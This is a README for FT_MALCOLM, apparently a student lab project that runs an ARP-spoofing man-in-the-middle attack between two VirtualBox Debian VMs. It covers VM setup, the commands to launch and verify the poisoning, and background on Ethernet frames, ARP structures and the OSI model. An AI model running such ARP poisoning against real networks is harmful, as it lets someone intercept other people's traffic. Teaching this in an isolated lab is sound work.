FT_MALCOLM is a project that demonstrates a Man-in-the-Middle (MITM) attack using ARP spoofing in a controlled virtual environment. This guide walks you through setting up two Debian virtual machines (one attacker, one victim), configuring their networks, and running the FT_MALCOLM tool to observe ARP poisoning in action. The document also explains the underlying network concepts and protocols involved.
- Overview
- Virtual Machine Setup
- VM Network Configuration
- Man-in-the-Middle Attack
- How It Works
- OSI Model
- Sources
This project requires two virtual machines: one as the victim and one as Malcolm (the attacker).
- Debian 12.11.0 Image: Download
- Virtualization: Oracle VM VirtualBox is recommended.
Tip: Install Guest Additions for clipboard sharing and drag-and-drop functionality.
After creating both VMs, enable clipboard sharing:
- In VirtualBox, go to Devices > Shared Clipboard > Bidirectional for each VM.
To avoid modifying the sudoers file, switch to root:
su -Update and install required packages:
sudo apt-get update && sudo apt-get upgrade
sudo apt-get install -y vim git net-tools iproute2 arping iputils-ping tcpdump
git clone https://github.com/ftTower/ft_malcom.git ft_malcolm
cd ft_malcolm
echo doneConfigure both VMs to use DHCP for the NAT network:
sudo bash -c 'cat <<EOF > /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information see interfaces(5).
source /etc/network/interfaces.d/*
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
auto enp0s3
iface enp0s3 inet dhcp
EOF'
echo "Network configuration replaced. Implementing DHCP for NAT network."
sudo systemctl restart networking
clear && ip a-
In VirtualBox, go to File > Tools > Network Manager > NAT Networks and create a new NAT network.
-
For both VMs, go to Machine > Settings > Network, set "Attached to" as NAT Network, and select your created network.
After configuring the VMs:
- (Optional) Use
nmapto scan IPs in a real scenario.
On Malcolm VM:
ip -r- Output:
default via <gateway_ip>
ip -a- Output:
link/ether <Malcolm_MAC_Address>
On Victim VM:
ip -a- Output:
inet <Victim_IP> - Output:
link/ether <Victim_MAC_Address>
On the Malcolm VM, start the attack tool with:
./ft_malcolm <gateway_ip> <malcolm_mac_address> <victim_ip> <victim_mac_address>
<gateway_ip>: Obtain withip -ron Malcolm VM.<malcolm_mac_address>: Obtain withip -aon Malcolm VM.<victim_ip>and<victim_mac_address>: Obtain withip -aon Victim VM.
Once FT_MALCOLM is running and listening, execute the following on the Victim VM to flush the ARP cache and trigger a new ARP request:
ip -s -s neigh flush all && ping -c 1 <gateway_ip>
Malcolm should detect the ARP request from the Victim VM to the gateway and respond accordingly.
To verify if the victim is ARP poisoned, display the ARP table on the Victim VM:
ip neigh show
You should see the gateway IP associated with Malcolm's MAC address, indicating a successful ARP spoofing attack.
You can observe the traffic with this command:
tcpdump -vv -i <interface> arpon 42 computer : enp0s3
- Preamble and Start Frame Delimiter (SFD): Used for clock synchronization between devices.
- Destination MAC Address: The physical address of the recipient's network card.
- Source MAC Address: The physical address of the sender's network card.
- Type/Length (EtherType): Indicates the type of upper-layer protocol encapsulated in the frame (e.g., 0x0800 for IPv4, 0x0806 for ARP).
- Data (Payload): The actual content, which can be an IP packet, an ARP message, etc. The minimum data size in an Ethernet frame is 46 bytes (padding bytes are added if the content is smaller).
- Frame Check Sequence (FCS): An error-detection code to ensure the frame was not corrupted during transmission.
The ARP table (Address Resolution Protocol) is a mapping table stored in memory (a cache) on each device in the network. Its role is to map IP addresses (Layer 3 logical addresses) to MAC addresses (Layer 2 physical addresses).
How the ARP table works:
- ARP Request: If a device needs the MAC address for an IP address it does not know, it sends an ARP request as a broadcast on the local network.
- ARP Reply: The device that owns the requested IP address responds with its MAC address. This reply is sent as a unicast frame.
- ARP Table Update: The device that initiated the request adds the IP-MAC entry to its ARP table for future communications.
struct ethhdr {
unsigned char h_dest[ETH_ALEN]; /* Destination Host Address */
unsigned char h_source[ETH_ALEN]; /* Source Host Address */
unsigned short h_proto; /* Protocol type */
};
struct ether_arp {
struct arphdr ea_hdr; /* ARP hrd & proto et al */
u_char arp_sha[ETH_ALEN]; /* Sender hardware address */
u_char arp_spa[4]; /* Sender protocol address */
u_char arp_tha[ETH_ALEN]; /* Target hardware address */
u_char arp_tpa[4]; /* Target protocol address */
};
struct arphdr {
unsigned short ar_hrd; /* Format of hardware address */
unsigned short ar_pro; /* Format of protocol address */
unsigned char ar_hln; /* Length of hardware address */
unsigned char ar_pln; /* Length of protocol address */
unsigned short ar_op; /* ARP opcode (command) */
};Layer 1: Physical Layer
Responsible for transmitting raw bits over the physical medium (cables, Wi-Fi, fiber optics).
Examples: RJ45 connectors, volts, Hz, bits, radio waves, Ethernet cables.
Layer 2: Data Link Layer
Ensures error-free data transmission over a direct link and manages physical addressing.
Examples: MAC addresses, Ethernet frames, switches, PPP, ARP.
Layer 3: Network Layer
Manages logical addressing and routing of packets across different networks.
Examples: IP addresses, routers, IP protocol.
Layer 4: Transport Layer
Provides reliable end-to-end communication between applications, segments data, and ensures correct order.
Examples: TCP, UDP, port numbers.
Layer 5: Session Layer
Establishes, manages, and terminates communication sessions between applications.
Examples: RPC, NetBIOS.
Layer 6: Presentation Layer
Ensures data format compatibility, translates, compresses, and encrypts data.
Examples: JPEG, ASCII, SSL/TLS.
Layer 7: Application Layer
Provides network services directly to software applications, closest to the user.
Examples: HTTP, FTP, SMTP, DNS.